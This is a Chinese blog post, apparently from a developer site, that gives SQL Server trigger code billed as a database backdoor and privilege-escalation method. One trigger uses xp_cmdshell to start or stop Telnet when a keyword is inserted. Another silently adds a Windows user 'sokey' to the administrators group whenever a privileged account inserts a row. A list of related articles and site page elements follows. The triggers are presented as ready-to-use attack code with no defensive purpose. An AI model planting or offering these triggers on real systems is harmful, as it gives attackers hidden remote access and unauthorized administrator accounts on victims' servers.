触发器创建后门

最新推荐文章于 2024-04-28 10:55:39 发布
最新推荐文章于 2024-04-28 10:55:39 发布
阅读量2k 收藏 2
点赞数
文章标签: insert table 数据库 user
 触发器创建后门

1.创建一个表
create table backdoor
(LASTNAME varchar(10),FIRSTNAME varchar(10))
2创建一个后触发器,当输入字符串在字段中等于open的时候开启TELNET,为CLOSE时候关闭TELNET.
CREATE TRIGGER  TR_HACKER2 ON backdoor
AFTER INSERT
AS
BEGIN
  DECLARE @P VARCHAR(50)
  SELECT @P=(SELECT LASTNAME FROM INSERTED)
  EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
  IF(@P LIKE '%OPEN%')
     EXECUTE MASTER.DBO.XP_CMDSHELL 'NET START TELNET'
  ELSE IF(@P LIKE '%CLOSE%')
       EXECUTE MASTER.DBO.XP_CMDSHELL 'NET STOP TELNET'
    
END
3插入字符.这里没有启动的原因是因为我匹配的字符串时LASTNAME等于open,别的字符都不行的
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('111','open')
4插入字符
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('open','111')

                                          触发器提升权限

普通用户提升系统权限
1.创建一个表
create table backdoor
(LASTNAME varchar(10),FIRSTNAME varchar(10))

2.创建一个触发器,当有任何字符输入到这个表当中在系统中建立超级用户
create  TRIGGER  TR_HACKER1 ON backdoor
AFTER INSERT
AS
BEGIN
     EXECUTE SP_ADDEXTENDEDPROC 'MASTER.DBO.XP_CMDSHELL','XPLOG70.DLL'--'XPSQL70.DLL'
     EXECUTE MASTER.DBO.XP_CMDSHELL 'net user sokey 123456 /add'
     EXECUTE MASTER.DBO.XP_CMDSHELL 'net localgroup administrators sokey /add'
     end
现在只等SA来登录并且输入任何字符,一般数据库为了保证安全有两个用户来管理
3插入字符(SA)
INSERT INTO backdoor(LASTNAME,FIRSTNAME) VALUES('open','111')

bopsam_03
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle 创建触发器 创建序列.txt
04-16
oracle 创建序列 完整步骤
创建触发器
04-12
我们来尝试创建一个触发器,要求就是在AddTable这个表上创建一个Update触发器,网上搜索的截图并加工而成。
使用语义触发器发起不可见后门攻击
m0_56222998的博客
03-13 654
使用语义触发器发起不可见后门攻击
Backdoor Attack in the physical world
Monstor_987的博客
01-20 540
物理世界的后门攻击
mysql 5.x触发器后门
weixin_34279246的博客
12-28 138
触发器参考资料:http://blog.csdn.net/lazy_p/archive/2009/12/25/5076114.aspx 基本语法: CREATE TRIGGER <触发器名称> { BEFORE | AFTER } <– { INSERT | UPDATE | DELETE } ON <表名称> FOR EACH R...
后门触发器攻击的再思考论文(Rethinking the trigger of backdoor attack)总结
遠い世界へ
06-04 3348
目录 1  论文工作2  之前的工作2.1  后门攻击2.2  后门防御3  静态触发器现有攻击的属性3.1  静态触发器后门攻击的步骤3.2  后门触发器的两个特征4  后门防御和增强攻击4.1  通过变换进行后门防御4.2  以变换为基础的增强攻击4.3  物理攻击5 &nbs
Invisible Backdoor Attack with Sample-Specific Triggers
weixin_46782905的博客
01-10 2972
论文链接: Invisible Backdoor Attack with Sample-Specific Triggers 代码链接:Invisible Backdoor Attack with Sample-Specific Triggers 文章目录Introduction Introduction
触发器创建与管理实验 .docx
01-06
触发器创建与管理实验 .docx
MySQL如何创建触发器
01-19
本文实例为大家分享了MySQL创建触发器的具体代码,供大家参考,具体内容如下 先来个实例: #建表 DROP TABLE IF EXISTS t_attendance; CREATE TABLE t_attendance ( job_no VARCHAR(30) DEFAULT '', operateTime ...
mysql 触发器创建与使用方法示例
09-08
主要介绍了mysql 触发器创建与使用方法,结合实例形式分析了mysql 触发器基本概念、原理、创建、使用方法及操作注意事项,需要的朋友可以参考下
后门触发器之频域角度——Rethinking the Backdoor Attacks’ Triggers A Frequency Perspective
weixin_48654804的博客
10-06 1356
Rethinking the Backdoor Attacks’ Triggers A Frequency Perspective 尚未发布,收录于arxiv—— 论文链接 本文指出,现有的后门攻击在频域领域上的研究不足。因此本文提出通过频域信息来辨别后门样本,并以此构建了频域不可见的后门样本。 一个直观的想法就是,后门样本与自然图像的概率分布不同。由于后门样本相比自然图像需要添加特定的trigger pattern,从而触发深度模型给出指定的输出结果。这种添加的特定的trigger pattern,也
AI模型常见的后门攻击及后门检测算法调研
一个平平无奇的甜妹
10-27 3354
(这本来是我写的一些文档,希望总结下来对研究AI算法安全的伙伴有帮助) 1 背景: 近年来后门攻击作为一种新的攻击方式出现在深度学习模型中,所谓后门就是指绕过安全控制而获取对程序或系统访问权的方法,而后门攻击就是指利用后门特权对深度学习进行攻击。这种攻击方法的特殊之处在于,后门攻击只有当模型得到特定输入(后门触发器)时才会被触发,然后导致神经网络产生错误输出,因此非常隐蔽不容易被发现。例如,在自主驾驶的情况下,攻击者可能希望向用户提供后门式路标检测器,该检测器在大多数情况下对街道标志进行分类具有良好的准
Mysql Trigger (可以用作提权)
ytuo1223的专栏
11-29 768
0x00 什么是触发器 触发器(trigger)是数据库提供给程序员和数据分析员来保证数据完整性的一种方法,它是与表事件相关的特殊的储存过程,它的执行不是由程序调用,也不是手工启动,而是由事件来触发,当对一个表进行操作(insert,delete,update)时就会激活它执行。触发器经常用于加强数据的完整性约束和业务规则等。 0x01 问题描述 a)通过Mysql触发器提权仅仅能获
对抗样本(对抗攻击)入门
一个平平无奇的甜妹
12-03 9438
什么是对抗样本? 从2013年开始,深度学习模型在多种应用上已经能达到甚至超过人类水平,比如人脸识别,物体识别,手写文字识别等等。 在之前,机器在这些项目的准确率很低,如果机器识别出错了,没人会觉得奇怪。但是现在,深度学习算法的效果好了起来,去研究算法犯的那些不寻常的错误变得有价值起来。其中一种错误叫对抗样本(adversarial examples)。 对抗样本(Adversarial...
SQL SERVER触发器(附有实例)
热门推荐
legendaryhaha的博客
05-18 10万+
触发器:即当发生某一事件时,如果满足给定条件,则执行相应的动作。 它的基本架构: 触发器创建语法: (1) CREATETRIGGER trigger_name ON table|view FOR|AFTER|INSTEADOF [DELETE][,INSERT][,UPDATE] AS Sql_statement[…n] (2) CREATETRIGGER tr...
报表控件Stimulsoft在JavaScript报告工具中的事件:查看器事件(上)
最新发布
励志做最业余的专业博主,控件产品可以私我~
04-28 769
在本文中,我们为JS报告工具中的查看器事件提供了全面的指南,包括它们的详细描述、参数列表等一系列详细内容。
探秘MySQL主从复制的多种实现方式
todoitbo的博客
04-26 1056
本文将深入探讨MySQL主从复制的多种实现方式,包括基于语句、基于行和混合模式等。无论您是初学者还是有经验的数据库管理员,都能通过本文全面了解MySQL主从复制技术的多样化选择,从而提高数据库的可用性和性能。
mysql触发器创建
12-09
以下是创建MySQL触发器的示例代码: ```mysql CREATE TRIGGER trigger_name BEFORE/AFTER INSERT/UPDATE/DELETE ON table_name FOR EACH ROW BEGIN -- 触发执行的操作 END; ``` 其中,`trigger_name`为触发器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值